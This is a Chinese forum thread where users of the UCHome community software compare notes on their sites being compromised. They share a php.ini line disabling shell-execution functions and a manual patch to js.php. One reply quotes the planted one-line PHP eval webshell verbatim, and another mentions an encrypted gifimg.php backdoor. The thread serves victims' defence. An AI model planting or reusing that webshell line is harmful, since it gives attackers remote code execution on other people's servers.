UChome出漏洞，来提醒一下各位，好自为之。

回复 9# bugx 的帖子


    你把uchome删掉要是还能进来，就证明有后门~呃~

哇噻，证明解决啊，新装上，正想举行活动以送Q钻来拉人气的，没想到在这里看到漏洞，怕怕啊，不知道在linux里面会不会有危险啊，知道的给我发个短消息。

回复 12# hjb510 的帖子


    我的就是LINUX的，一样被挂啊。

刚才又被写入了一句木马

<?php @eval($_POST['c']);?>

确实有这个问题，跟操作系统没关系

我昨天又被传了个这样的文件上来

不过上次之后，修改了php.ini

disable_functions =passthru,exec,shell_exec,system

这次传上文件来，没权限执行了挂马操作了

DZ论坛也有漏洞

上传图片木马这个漏洞是ngnix里的漏洞，是解析问题，uch上传图片是经过过滤的，对于ngnix，要么升级，要么暂停图片上传。

这个漏洞是4月15日发现的，你只要打了4.16的补丁就没事了

手动修复i的方法打开js.php

找到

$r = array("\n", '', 'js_mkurl("\\1", "\\2")');
替换为
$r = array("\n", '', "js_mkurl('\\1', '\\2')");


你要是打了4.16的补丁就发现已经是那句代码 $r = array("\n", '', "js_mkurl('\\1', '\\2')");  
了

我 windows 虚拟主机 设置不了权限怎么办？

我早已经中毒～
images的目录下都有一个gifimg.php文件，并且加密过。
有些PHP和html文件被感染。

回复 17# 赤色彗星 的帖子


    我们在5月末下载的版本，安装的uchome，一样中招。